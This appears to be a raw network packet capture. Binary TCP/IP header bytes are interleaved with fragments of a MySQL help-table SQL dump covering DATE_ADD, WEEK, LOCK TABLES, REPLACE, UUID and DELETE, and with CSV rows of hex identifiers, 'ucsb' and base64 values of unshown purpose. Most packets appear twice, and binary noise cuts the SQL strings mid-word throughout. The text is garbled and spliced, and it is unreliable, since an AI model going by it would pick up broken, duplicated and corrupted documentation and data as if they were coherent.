CASCADE]',''),(20,'DATE OPERATIONS',14,' DATE_ADD(date,INTERVAL expr type)\n DATE_SUB(date,INTERVAL expr type)\n\nThese functions perform date arithmetic.\ndate is a DATETIME or DATE value specifying the starting\ndate. expr is an expression specifying the interval value to be added\nor subtracted from the starting date. expr is a string; it may start\nwith a \'-\' for negative intervals. type is a keyword indicating\nhow the expression should be interpreted.\n','mysql> SELECT \'1997-12-31 23:59:59\' + INTERVAL 1 SECOND;\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT INTERVAL 1 DAY + \'1997-12-31\';\n -> \'1998-01-01\'\nmysql> SELECT \'1998-01-01\' - INTERVAL 1 SECOND;\n -> \'1997-12-31 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL 1 SECOND);\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL 1 DAY);\n -> \'1998-01-01 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL \'1:1\' C bb0`BiET@/Ԁo0SE<@@w  3Potj l$ |)< for each non-existent view.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE, if given, are parsed and ignored.\n','DROP VIEW [IF EXISTS]\n view_name [, view_name] ...\n [RESTRICT | CASCADE]',''),(20,'DATE OPERATIONS',14,' DATE_ADD(date,INTERVAL expr type)\n DATE_SUB(date,INTERVAL expr type)\n\nThese functions perform date arithmetic.\ndate is a DATETIME or DATE value specifying the starting\ndate. expr is an expression specifying the interval value to be added\nor subtracted from the starting date. expr is a string; it may start\nwith a \'-\' for negative intervals. type is a keyword indicating\nhow the expression should be interpreted.\n','mysql> SELECT \'1997-12-31 23:59:59\' + INTERVAL 1 SECOND;\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT INTERVAL 1 DAY + \'1997-12-31\';\n -> \'1998-01-01\'\nmysql> SELECT \'1998-01-01\' - INTERVAL 1 SECOND;\n -> \'1997-12-31 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL 1 SECOND);\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL 1 DAY);\n -> \'1998-01-01 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL \'1:1\' C ZZBi0`EL@/܂Sŀo0E4\=@?B 3 Pu}U$ )K،C ZZ0`BiEL@/go0AE4\=@@B 3 Pu}U$ )K،C bbBi0`ET@/p܂Ao0E<@?x  3Pttj  |) \'1998-01-01 00:01:00\'\nmysql> SELECT DATE_SUB(\'1998-01-01 00:00:00\',\n -> INTERVAL \'1 1:1:1\' DAY_SECOND);\n -> \'1997-12-30 22:58:59\'\nmysql> SELECT DATE_ADD(\'1998-01-01 00:00:00\',\n -> INTERVAL \'-1 10\' DAY_HOUR);\n -> \'1997-12-30 14:00:00\'\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT DATE_ADD(\'1992-12-31 23:59:59.000002\',\n -> INTERVAL \'1.999999\' SECOND_MICROSECOND);\n -> \'1993-01-01 00:00:01.000001\'',''),(21,'WITHIN',11,' Within(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially within\ng2.\n','',''),(22,'WEEK',14,' WEEK(date[,mode])\nThe function returns the week number for date. The two-argument form\nof WEEK() allows you to specify whether the week starts on Sunday or\nMonday and whether the return value should be in the range from 0 to\n53 or from 1 to 53. If the mode argument is\nomitted, the value of the default_week_format system variable is\nused (or 0 before MySQL 4.0.14).\nSee also : [Server system variables].\n\nThe following table describes how the mode argument works:\n\n First day \n Mode of week Range Week 1 is the first week...\n 0 SundayC  bb0`BiET@/Ԁo0SE<@@w  3Pttj  |) \'1998-01-01 00:01:00\'\nmysql> SELECT DATE_SUB(\'1998-01-01 00:00:00\',\n -> INTERVAL \'1 1:1:1\' DAY_SECOND);\n -> \'1997-12-30 22:58:59\'\nmysql> SELECT DATE_ADD(\'1998-01-01 00:00:00\',\n -> INTERVAL \'-1 10\' DAY_HOUR);\n -> \'1997-12-30 14:00:00\'\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT DATE_ADD(\'1992-12-31 23:59:59.000002\',\n -> INTERVAL \'1.999999\' SECOND_MICROSECOND);\n -> \'1993-01-01 00:00:01.000001\'',''),(21,'WITHIN',11,' Within(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially within\ng2.\n','',''),(22,'WEEK',14,' WEEK(date[,mode])\nThe function returns the week number for date. The two-argument form\nof WEEK() allows you to specify whether the week starts on Sunday or\nMonday and whether the return value should be in the range from 0 to\n53 or from 1 to 53. If the mode argument is\nomitted, the value of the default_week_format system variable is\nused (or 0 before MySQL 4.0.14).\nSee also : [Server system variables].\n\nThe following table describes how the mode argument works:\n\n First day \n Mode of week Range Week 1 is the first week...\n 0 SundayCo Bi0`E@/s6Ao0E@?{  3Pytj  |)< 0-53 with a Sunday in this year\n 1 Monday 0-53 with more than 3 days this year\n 2 Sunday 1-53 with a Sunday in this year\n 3 Monday 1-53 with more than 3 days this year\n 4 Sunday 0-53 with more than 3 days this year\n 5 Monday 0-53 with a Monday in this year\n 6 Sunday 1-53 with more than 3 days this year\n 7 Monday 1-53 with a Monday in this year\n \n\nA mode value of 3 can be used as of MySQL 4.0.5.\nValues of 4 and above can be used as of MySQL 4.0.17.\n','mysql> SELECT WEEK(\'1998-02-20\');\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',0);\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',1);\n -> 8\nC 0`BiE@/.o0SE@@z  3Pytj  |)< 0-53 with a Sunday in this year\n 1 Monday 0-53 with more than 3 days this year\n 2 Sunday 1-53 with a Sunday in this year\n 3 Monday 1-53 with more than 3 days this year\n 4 Sunday 0-53 with more than 3 days this year\n 5 Monday 0-53 with a Monday in this year\n 6 Sunday 1-53 with more than 3 days this year\n 7 Monday 1-53 with a Monday in this year\n \n\nA mode value of 3 can be used as of MySQL 4.0.5.\nValues of 4 and above can be used as of MySQL 4.0.17.\n','mysql> SELECT WEEK(\'1998-02-20\');\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',0);\n -> 7\nmysql> SELECT WEEK(\'1998-02-20\',1);\n -> 8\nC ZZBi0`EL@/܂Sŀo0E4\?@?@ 3 Pu}U$w )L،C ZZ0`BiEL@/go0AE4\?@@@ 3 Pu}U$w )L،C<# bbBi0`ET@/,|po0E< 9@?  P2y?  ld`3964,ucsb,MTNzEwEDA0+8VcM7JqcWOAOpi8ohhtzSuQz3Dw==
22EB3B7A95FD0C91A377684126278E82,ucsb,MTNzEwEDA1DcXlINcoDE1EiB6kZlNasg5ie9hQ==
111109915DC9ABC440395EDB7CA08E8D,ucsb,MTNzEwEDA1FyDO3eS27aRkh37iwpGDXyL4TanQ==
76AF87A6D9DA30A92A42FFCD4C1040E6,ucsb,MTNzEwEDA1Lem+YWThdQjtWltxZ5WkxyN3ic9w==
321088A705636E600134E8040AE18BAC,ucsb,MTNzEwEDA1MZHahhcLJdjDuPLUjarf474pwJug==
EBFCCA8FD0EE0612FF996A98CCF79A3C,ucsb,MTNzEwEDA1SgzzP1+AKJ1xsFlulLco9PnsD8tg==
C1D4039924762EC24344533D9590276D,ucsb,MTNzEwEDA1VI3yfqFvYZstx5rTZXycdiGXre9Q==
161980F413ECCEB3E82072F0F8DBC57B,ucsb,MTNzEwEDA1Z11HIgbZuT2ImiqGiTkXRYbjhdCA==
06C7586B7A6F9BC4FBFB82E295C3FEB9,ucsb,MTNzEwEDA1dRO2Dq+IUVUDHtAUbqWbj4K7afLQ==
EA88DE48D936831108C7C3FE8BFA90DD,ucsb,MTNzEwEDA1iKazkPx3rE4ZC3bcpWUcBm7/5CIQ==
043F1CB20C4B53FF235F91E9F8369DEF,ucsb,MTNzEwEDA1m0QsPlEZVeZGR5UGtQ9o8ASYaarQ==
505056E4CEDF054644ED05D1008CD5FD,ucsb,MTNzEwEDA1prOtq9X4d++9tCiw6IYbWrqf07vA==
52DC1A30D7C0AFC0AD1B32874ACF4BAC,ucsb,MTNzEwEDA1sFY0A5LkUaQcPdiWN25NCFr1xT7w==
8C83E6F38295E5010AAE8D74EF11EF35,ucsb,MTNzEwEDA1yTd7nXY7VFRW0at746bUj4y4Mpfw==
7833291314DD788AEB136A53A930E86D,ucsb,MTNzEwEDA12BgLNPYh4koNmJrYuS7/UNN5B65w==
BF28B82933CEBBA59B7D30978F7B6185,ucsb,MTNzEwEDA14eJWJKPyx1pxhUqPAK+ZwbMCW# bb0`BiET@/o0AE< 9@@  P2y?  ld`3964,ucsb,MTNzEwEDA0+8VcM7JqcWOAOpi8ohhtzSuQz3Dw==
22EB3B7A95FD0C91A377684126278E82,ucsb,MTNzEwEDA1DcXlINcoDE1EiB6kZlNasg5ie9hQ==
111109915DC9ABC440395EDB7CA08E8D,ucsb,MTNzEwEDA1FyDO3eS27aRkh37iwpGDXyL4TanQ==
76AF87A6D9DA30A92A42FFCD4C1040E6,ucsb,MTNzEwEDA1Lem+YWThdQjtWltxZ5WkxyN3ic9w==
321088A705636E600134E8040AE18BAC,ucsb,MTNzEwEDA1MZHahhcLJdjDuPLUjarf474pwJug==
EBFCCA8FD0EE0612FF996A98CCF79A3C,ucsb,MTNzEwEDA1SgzzP1+AKJ1xsFlulLco9PnsD8tg==
C1D4039924762EC24344533D9590276D,ucsb,MTNzEwEDA1VI3yfqFvYZstx5rTZXycdiGXre9Q==
161980F413ECCEB3E82072F0F8DBC57B,ucsb,MTNzEwEDA1Z11HIgbZuT2ImiqGiTkXRYbjhdCA==
06C7586B7A6F9BC4FBFB82E295C3FEB9,ucsb,MTNzEwEDA1dRO2Dq+IUVUDHtAUbqWbj4K7afLQ==
EA88DE48D936831108C7C3FE8BFA90DD,ucsb,MTNzEwEDA1iKazkPx3rE4ZC3bcpWUcBm7/5CIQ==
043F1CB20C4B53FF235F91E9F8369DEF,ucsb,MTNzEwEDA1m0QsPlEZVeZGR5UGtQ9o8ASYaarQ==
505056E4CEDF054644ED05D1008CD5FD,ucsb,MTNzEwEDA1prOtq9X4d++9tCiw6IYbWrqf07vA==
52DC1A30D7C0AFC0AD1B32874ACF4BAC,ucsb,MTNzEwEDA1sFY0A5LkUaQcPdiWN25NCFr1xT7w==
8C83E6F38295E5010AAE8D74EF11EF35,ucsb,MTNzEwEDA1yTd7nXY7VFRW0at746bUj4y4Mpfw==
7833291314DD788AEB136A53A930E86D,ucsb,MTNzEwEDA12BgLNPYh4koNmJrYuS7/UNN5B65w==
BF28B82933CEBBA59B7D30978F7B6185,ucsb,MTNzEwEDA14eJWJKPyx1pxhUqPAK+ZwbMC[# bbBi0`ET@/أ  o0E<|$@?  PeZ>̀  _cOu0iD6NIA==
E1E14354AEB86CB31F8B3DDD22149ACE,ucsb,MTNzEwEDA7A/ZjYyxnQLpGjOUZ2PZQnRQ0QvNw==
32F4AD1011B0EAAB6D6874A5A861E283,ucsb,MTNzEwEDA7FhZPk7yz/ie8Vd4nrBDbwdCAqY+A==
386C7DD91EF62D5F29494448EA6AFEA2,ucsb,MTNzEwEDA7KeFOLik/XE1prCAbluCUmI2pHPWg==
1379AFCB8FF45001B864D9AA622509E3,ucsb,MTNzEwEDA7OHhj+8yre3C+2VdhTq4hjCcD6suQ==
4BD65A723B4531D2B3051EEAD98DFF32,ucsb,MTNzEwEDA7QFLEQ710XjPtdLOWJkpMRAB3fGdQ==
00C1C2F6A9B45EB6A6CD2B202C7907ED,ucsb,MTNzEwEDA7UaNr9jbLfkcMRW9ex+dBp4cDI6bA==
FA7B8231CE6AAF3B4D2320B17EF4A7B9,ucsb,MTNzEwEDA7bVvSNKXnlXRAcbSsa356SzGpXi+A==
D0B0C8AB843C8C36DB6B56919359AF22,ucsb,MTNzEwEDA7dAAjfpLRTghUJCAYjmFinEPqFdCQ==
69DA79E2DB96475B15E13EB2450A766A,ucsb,MTNzEwEDA7jF6teWK0EU+gZSx5OWldT41KjPwg==
0D69194054F9176158CBE15E9FD58F8F,ucsb,MTNzEwEDA7lwK6lWMVW6TGg18aUOpIO6Y2azPA==
725850E55471006E85278D5299036F70,ucsb,MTNzEwEDA7oJML/ulblgIWjeNaz22ucEWchX+g==
0850B41B6D6F1A5409B1B4E970BB6D0A,ucsb,MTNzEwEDA7u6X0rnmFQBTVUrAntCjoOlpMe7Vw==
9CE0847B9E4CD0456369AF89AB6DFC88,ucsb,MTNzEwEDA7zzcoO2jD02PpTDFftLGmZhQJ4f/Q==
3B3B8FF83ED4215C25427921DA6E7910,ucsb,MTNzEwEDA71WEuYAvGLBRPEhFAryXgAHcRn5Eg==
B8FCF6E73F808EEA8067FAB8E77B546E,ucsb,MTNzEwEDA74jGQFcnaM7QrQE58mBjm64SE9tCQ==
76CDF7C1239FFBA96B5EF23E489Cs# bb0`BiET@/o0AE<|$@@  PeZ>̀  _cOu0iD6NIA==
E1E14354AEB86CB31F8B3DDD22149ACE,ucsb,MTNzEwEDA7A/ZjYyxnQLpGjOUZ2PZQnRQ0QvNw==
32F4AD1011B0EAAB6D6874A5A861E283,ucsb,MTNzEwEDA7FhZPk7yz/ie8Vd4nrBDbwdCAqY+A==
386C7DD91EF62D5F29494448EA6AFEA2,ucsb,MTNzEwEDA7KeFOLik/XE1prCAbluCUmI2pHPWg==
1379AFCB8FF45001B864D9AA622509E3,ucsb,MTNzEwEDA7OHhj+8yre3C+2VdhTq4hjCcD6suQ==
4BD65A723B4531D2B3051EEAD98DFF32,ucsb,MTNzEwEDA7QFLEQ710XjPtdLOWJkpMRAB3fGdQ==
00C1C2F6A9B45EB6A6CD2B202C7907ED,ucsb,MTNzEwEDA7UaNr9jbLfkcMRW9ex+dBp4cDI6bA==
FA7B8231CE6AAF3B4D2320B17EF4A7B9,ucsb,MTNzEwEDA7bVvSNKXnlXRAcbSsa356SzGpXi+A==
D0B0C8AB843C8C36DB6B56919359AF22,ucsb,MTNzEwEDA7dAAjfpLRTghUJCAYjmFinEPqFdCQ==
69DA79E2DB96475B15E13EB2450A766A,ucsb,MTNzEwEDA7jF6teWK0EU+gZSx5OWldT41KjPwg==
0D69194054F9176158CBE15E9FD58F8F,ucsb,MTNzEwEDA7lwK6lWMVW6TGg18aUOpIO6Y2azPA==
725850E55471006E85278D5299036F70,ucsb,MTNzEwEDA7oJML/ulblgIWjeNaz22ucEWchX+g==
0850B41B6D6F1A5409B1B4E970BB6D0A,ucsb,MTNzEwEDA7u6X0rnmFQBTVUrAntCjoOlpMe7Vw==
9CE0847B9E4CD0456369AF89AB6DFC88,ucsb,MTNzEwEDA7zzcoO2jD02PpTDFftLGmZhQJ4f/Q==
3B3B8FF83ED4215C25427921DA6E7910,ucsb,MTNzEwEDA71WEuYAvGLBRPEhFAryXgAHcRn5Eg==
B8FCF6E73F808EEA8067FAB8E77B546E,ucsb,MTNzEwEDA74jGQFcnaM7QrQE58mBjm64SE9tCQ==
76CDF7C1239FFBA96B5EF23E489C;$ bbBi0`ET@/,|po0E< :@?  P2~? ;# md`CNImQ==
756A1E161A97971D6150E029F3F9BDB9,ucsb,MTNzEwEDA1/EftIlQWlWatDTQc6JG/q+evoHmA==
D12444A74AC25FFC7940C114CD7FDA51,ucsb,MTNzEwEDA2CqdkhJ1m6MC1DoMpETCp5/0au5pg==
E30357667CBF416AF594AE5333795CEC,ucsb,MTNzEwEDA2HyUHOhUPUdM5tOAJ/n32o1Di/U9Q==
3E7A3C177E147FA16A24C5EF3E1481B3,ucsb,MTNzEwEDA2K7gs1HK7rkc7NQQPCTfx72QfBZkw==
3BD9C07D3B4CDAD39995112E6B816A06,ucsb,MTNzEwEDA2NSUiiw9s03f0J0XkpAx8Jp6uDs6Q==
908A55B96FB9E9AB3830046C7E7B34B7,ucsb,MTNzEwEDA2QEmu5clFTkDwQxNWx92PmgFU5kVw==
131E0F162E8724442973CD6339CD1471,ucsb,MTNzEwEDA2Wzmy0U1KutoA/WrvS1OGSNUmeD9w==
16C74202556FD53C136894ED78DC1BE3,ucsb,MTNzEwEDA2aFqQjEAIxNbFHEdUhwaYkG7CJRTA==
E77C0DC16AF081A2CD4535063BF80488,ucsb,MTNzEwEDA2dqFQRgnYhLZKNixNKwqoM5Bs38Ug==
A078A754B8302D2C11EDE687834D8DFA,ucsb,MTNzEwEDA2gcZRiKJXUg+gpxLvtvxr1VVU79JA==
28E9C38E357B9DA03B2B96E990998F84,ucsb,MTNzEwEDA2lT0+GbRU6ShUGyagB+vchXaVfV0A==
C906619B75073C6C1333877F03178100,ucsb,MTNzEwEDA2pJcR9uHcbVmUFP5QN+XSurvZBD5w==
A195C11AEEF4FC1DD974099FD9B363B4,ucsb,MTNzEwEDA2vJ1ooF1hI0ljARNF7D5NHCPzQ8pA==
654BAEC100FFDA583ADFACFAD6056AFC,ucsb,MTNzEwEDA2ygmGVNu5quALpLrOcVxrFXjFylhQ==
13A99B49C9CDB8B3FB6E82466EEB0328,ucsb,MTNzEwEDA2018o671b6IcLixwt/sGkMeA4AbCA==
7B69AB2FC19D1F7D25D8980DF578133CD$ bbBi0`ET@/p܂Ao0E<@?x  3P|itj Qr ) SELECT WEEK(\'1998-12-31\',1);\n -> 53',''),(23,'LOCK',10,'LOCK TABLES locks tables for the current thread. If any of the tables\nare locked by other threads, it blocks until all locks can be acquired.\nUNLOCK TABLES releases any locks held by the current thread.\nAll tables that are locked by the current thread are implicitly unlocked\nwhen the thread issues another LOCK TABLES, or when the connection\nto the server is closed.\n\nA table lock protects only against inappropriate reads or writes by other\nclients. The client holding the lock, even a read lock, can perform\ntable-level operations such as DROP TABLE.\n','LOCK TABLES\n tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}\n [, tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}] ...\nUNLOCK TABLES',''),(24,'CHECK',7,'Checks a table or tables for errors. CHECK TABLE works for\nMyISAM and InnoDB tables. For MyISAM tables, the key statistics are updated.\n\nAs of MySQL 5.0.2, CHECK TABLE also can check views for problems, such\nas tables that are referenced in the view definition that no longer exist.\n','CHECK TABLE tbl_name [, tbl_name] ... [option] ...\n\noption = {QUICK | FAST | MEDIUM | EXTENDED | CHANGED}',''),(25,'RESET SLAVE',7,'RESET SLAVE\n\nMakes the slave forget iC]$ bb0`BiET@/o0AE< :@@  P2~? ;# md`CNImQ==
756A1E161A97971D6150E029F3F9BDB9,ucsb,MTNzEwEDA1/EftIlQWlWatDTQc6JG/q+evoHmA==
D12444A74AC25FFC7940C114CD7FDA51,ucsb,MTNzEwEDA2CqdkhJ1m6MC1DoMpETCp5/0au5pg==
E30357667CBF416AF594AE5333795CEC,ucsb,MTNzEwEDA2HyUHOhUPUdM5tOAJ/n32o1Di/U9Q==
3E7A3C177E147FA16A24C5EF3E1481B3,ucsb,MTNzEwEDA2K7gs1HK7rkc7NQQPCTfx72QfBZkw==
3BD9C07D3B4CDAD39995112E6B816A06,ucsb,MTNzEwEDA2NSUiiw9s03f0J0XkpAx8Jp6uDs6Q==
908A55B96FB9E9AB3830046C7E7B34B7,ucsb,MTNzEwEDA2QEmu5clFTkDwQxNWx92PmgFU5kVw==
131E0F162E8724442973CD6339CD1471,ucsb,MTNzEwEDA2Wzmy0U1KutoA/WrvS1OGSNUmeD9w==
16C74202556FD53C136894ED78DC1BE3,ucsb,MTNzEwEDA2aFqQjEAIxNbFHEdUhwaYkG7CJRTA==
E77C0DC16AF081A2CD4535063BF80488,ucsb,MTNzEwEDA2dqFQRgnYhLZKNixNKwqoM5Bs38Ug==
A078A754B8302D2C11EDE687834D8DFA,ucsb,MTNzEwEDA2gcZRiKJXUg+gpxLvtvxr1VVU79JA==
28E9C38E357B9DA03B2B96E990998F84,ucsb,MTNzEwEDA2lT0+GbRU6ShUGyagB+vchXaVfV0A==
C906619B75073C6C1333877F03178100,ucsb,MTNzEwEDA2pJcR9uHcbVmUFP5QN+XSurvZBD5w==
A195C11AEEF4FC1DD974099FD9B363B4,ucsb,MTNzEwEDA2vJ1ooF1hI0ljARNF7D5NHCPzQ8pA==
654BAEC100FFDA583ADFACFAD6056AFC,ucsb,MTNzEwEDA2ygmGVNu5quALpLrOcVxrFXjFylhQ==
13A99B49C9CDB8B3FB6E82466EEB0328,ucsb,MTNzEwEDA2018o671b6IcLixwt/sGkMeA4AbCA==
7B69AB2FC19D1F7D25D8980DF578133Cp$ bb0`BiET@/Ԁo0SE<@@w  3P|itj Qr ) SELECT WEEK(\'1998-12-31\',1);\n -> 53',''),(23,'LOCK',10,'LOCK TABLES locks tables for the current thread. If any of the tables\nare locked by other threads, it blocks until all locks can be acquired.\nUNLOCK TABLES releases any locks held by the current thread.\nAll tables that are locked by the current thread are implicitly unlocked\nwhen the thread issues another LOCK TABLES, or when the connection\nto the server is closed.\n\nA table lock protects only against inappropriate reads or writes by other\nclients. The client holding the lock, even a read lock, can perform\ntable-level operations such as DROP TABLE.\n','LOCK TABLES\n tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}\n [, tbl_name [AS alias] {READ [LOCAL] | [LOW_PRIORITY] WRITE}] ...\nUNLOCK TABLES',''),(24,'CHECK',7,'Checks a table or tables for errors. CHECK TABLE works for\nMyISAM and InnoDB tables. For MyISAM tables, the key statistics are updated.\n\nAs of MySQL 5.0.2, CHECK TABLE also can check views for problems, such\nas tables that are referenced in the view definition that no longer exist.\n','CHECK TABLE tbl_name [, tbl_name] ... [option] ...\n\noption = {QUICK | FAST | MEDIUM | EXTENDED | CHANGED}',''),(25,'RESET SLAVE',7,'RESET SLAVE\n\nMakes the slave forget iC( bbBi0`ET@/p܂Ao0E<@?x  3Pqtj ( ) 3 Pu}U$mx )MٌC* ZZ0`BiEL@/go0AE4\A@@> 3 Pu}U$mx )MٌC, bbBi0`ET@/p܂Ao0E<@?x  3Pytj 8- )= in the range 0 to 59.\n','mysql> SELECT MINUTE(\'98-02-03 10:05:03\');\n -> 5',''),(28,'DAY',14,' DAY(date)\n\nDAY() is a synonym for DAYOFMONTH().\nIt is available as of MySQL 4.1.1.\n','',''),(29,'MID',23,' MID(str,pos,len)\n\nMID(str,pos,len) is a synonym for\nSUBSTRING(str,pos,len).\n','',''),(30,'REPLACE INTO',6,'REPLACE works exactly like INSERT, except that if an old\nrecord in the table has the same value as a new record for a PRIMARY\nKEY or a UNIQUE index, the old record is deleted before the new\nrecord is inserted.\nSee also : [INSERT, ,INSERT].\n\nNote that unless the table has a PRIMARY KEY or UNIQUE index,\nusing a REPLACE statement makes no sense. It becomes equivalent to\nINSERT, because there is no index to be used to determine whether a new\nrow duplicates another.\n\nValues for all columns are taken from the values specified in the\nREPLACE statement. Any missing columns are set to their default\nvalues, just as happens for INSERT. You can\'t refer to values from\nthe current row and use them in the new row. If you use an assignment such\nas SET col_name = col_name + 1, the reference to the\ncolumn name on the right hand side is treated as\nDEFAULT(col_name), so the assignment is equivalent to SET\ncol_name = DEFAULT(col_name) + 1.\nC- bb0`BiET@/Ԁo0SE<@@w  3Pytj 8- )= in the range 0 to 59.\n','mysql> SELECT MINUTE(\'98-02-03 10:05:03\');\n -> 5',''),(28,'DAY',14,' DAY(date)\n\nDAY() is a synonym for DAYOFMONTH().\nIt is available as of MySQL 4.1.1.\n','',''),(29,'MID',23,' MID(str,pos,len)\n\nMID(str,pos,len) is a synonym for\nSUBSTRING(str,pos,len).\n','',''),(30,'REPLACE INTO',6,'REPLACE works exactly like INSERT, except that if an old\nrecord in the table has the same value as a new record for a PRIMARY\nKEY or a UNIQUE index, the old record is deleted before the new\nrecord is inserted.\nSee also : [INSERT, ,INSERT].\n\nNote that unless the table has a PRIMARY KEY or UNIQUE index,\nusing a REPLACE statement makes no sense. It becomes equivalent to\nINSERT, because there is no index to be used to determine whether a new\nrow duplicates another.\n\nValues for all columns are taken from the values specified in the\nREPLACE statement. Any missing columns are set to their default\nvalues, just as happens for INSERT. You can\'t refer to values from\nthe current row and use them in the new row. If you use an assignment such\nas SET col_name = col_name + 1, the reference to the\ncolumn name on the right hand side is treated as\nDEFAULT(col_name), so the assignment is equivalent to SET\ncol_name = DEFAULT(col_name) + 1.\nC/ ZZBi0`EL@/܂Sŀo0E4\C@?< 3 Pu}U$$cg )MڌC0 ZZ0`BiEL@/go0AE4\C@@< 3 Pu}U$$cg )MڌC]2 bbBi0`ET@/p܂Ao0E<@?x  3Ptj  )=\nTo be able to use REPLACE, you must have INSERT and\nDELETE privileges for the table.\n','REPLACE [LOW_PRIORITY | DELAYED]\n [INTO] tbl_name [(col_name,...)]\n VALUES ({expr | DEFAULT},...),(...),...',''),(31,'UUID',21,' UUID()\n\nReturns a Universal Unique Identifier (UUID) generated\naccording to ``DCE 1.1: Remote Procedure Call\'\' (Appendix A)\nCAE (Common Applications Environment) Specifications\npublished by The Open Group in October 1997 (Document Number C706).\n\nA UUID is designed as a number that is globally unique in space and\ntime. Two calls to UUID() are expected to generate two different\nvalues, even if these calls are performed on two separate computers that are\nnot connected to each other.\n\nA UUID is a 128-bit number represented by a string\nof five hexadecimal numbers in aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\nformat:\n\n\n --- The first three numbers are generated from a timestamp.\n\n --- The fourth number preserves temporal uniqueness in case the timestamp value loses\nmonotonicity (for example, due to daylight saving time).\n\n --- The fifth number is an IEEE 802 node number that provides spatial uniqueness. A\nrandom number is substituted if the latter is not available (for example,\nbecause the host computer has no Ethernet card, oCx2 bb0`BiET@/Ԁo0SE<@@w  3Ptj  )=\nTo be able to use REPLACE, you must have INSERT and\nDELETE privileges for the table.\n','REPLACE [LOW_PRIORITY | DELAYED]\n [INTO] tbl_name [(col_name,...)]\n VALUES ({expr | DEFAULT},...),(...),...',''),(31,'UUID',21,' UUID()\n\nReturns a Universal Unique Identifier (UUID) generated\naccording to ``DCE 1.1: Remote Procedure Call\'\' (Appendix A)\nCAE (Common Applications Environment) Specifications\npublished by The Open Group in October 1997 (Document Number C706).\n\nA UUID is designed as a number that is globally unique in space and\ntime. Two calls to UUID() are expected to generate two different\nvalues, even if these calls are performed on two separate computers that are\nnot connected to each other.\n\nA UUID is a 128-bit number represented by a string\nof five hexadecimal numbers in aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\nformat:\n\n\n --- The first three numbers are generated from a timestamp.\n\n --- The fourth number preserves temporal uniqueness in case the timestamp value loses\nmonotonicity (for example, due to daylight saving time).\n\n --- The fifth number is an IEEE 802 node number that provides spatial uniqueness. A\nrandom number is substituted if the latter is not available (for example,\nbecause the host computer has no Ethernet card, oC6 bbBi0`ET@/p܂Ao0E<@?x  3Ptj . )=r we do not know how to\nfind the hardware address of an interface on your operating system). In\nthis case, spatial uniqueness cannot be guaranteed. Nevertheless, a\ncollision should have /very/ low probability.\n\nCurrently, the MAC address of an interface is taken into account only on\nFreeBSD and Linux. On other operating systems, MySQL uses a randomly generated\n48-bit number.\n','mysql> SELECT UUID();\n -> \'6ccd780c-baba-1026-9564-0040f4311e29\'',''),(32,'LINESTRING',2,' LineString(pt1,pt2,...)\nConstructs a WKB LineString value from a number of WKB Point\narguments. If any argument is not a WKB Point, the return value\nis NULL. If the number of Point arguments is less than two,\nthe return value is NULL.\n','',''),(33,'CONNECTION_ID',25,' CONNECTION_ID()\nReturns the connection ID (thread ID) for the connection.\nEvery connection has its own unique ID.\n','mysql> SELECT CONNECTION_ID();\n -> 23786',''),(34,'DELETE',6,'DELETE deletes rows from tbl_name that satisfy the condition\ngiven by where_definition, and returns the number of records deleted.\n\nIf you issue a DELETE statement with no WHERE clause, all\nrows are deleted. A faster way to do this, when you don\'t want to know\nthe number of deleted rows, is to use TRUNCATE TABLE.\nSee C6 bb0`BiET@/Ԁo0SE<@@w  3Ptj . )=r we do not know how to\nfind the hardware address of an interface on your operating system). In\nthis case, spatial uniqueness cannot be guaranteed. Nevertheless, a\ncollision should have /very/ low probability.\n\nCurrently, the MAC address of an interface is taken into account only on\nFreeBSD and Linux. On other operating systems, MySQL uses a randomly generated\n48-bit number.\n','mysql> SELECT UUID();\n -> \'6ccd780c-baba-1026-9564-0040f4311e29\'',''),(32,'LINESTRING',2,' LineString(pt1,pt2,...)\nConstructs a WKB LineString value from a number of WKB Point\narguments. If any argument is not a WKB Point, the return value\nis NULL. If the number of Point arguments is less than two,\nthe return value is NULL.\n','',''),(33,'CONNECTION_ID',25,' CONNECTION_ID()\nReturns the connection ID (thread ID) for the connection.\nEvery connection has its own unique ID.\n','mysql> SELECT CONNECTION_ID();\n -> 23786',''),(34,'DELETE',6,'DELETE deletes rows from tbl_name that satisfy the condition\ngiven by where_definition, and returns the number of records deleted.\n\nIf you issue a DELETE statement with no WHERE clause, all\nrows are deleted. A faster way to do this, when you don\'t want to know\nthe number of deleted rows, is to use TRUNCATE TABLE.\nSee C29 bbBi0`ET@/أ  o0E<@?j  3PZi5 Qy 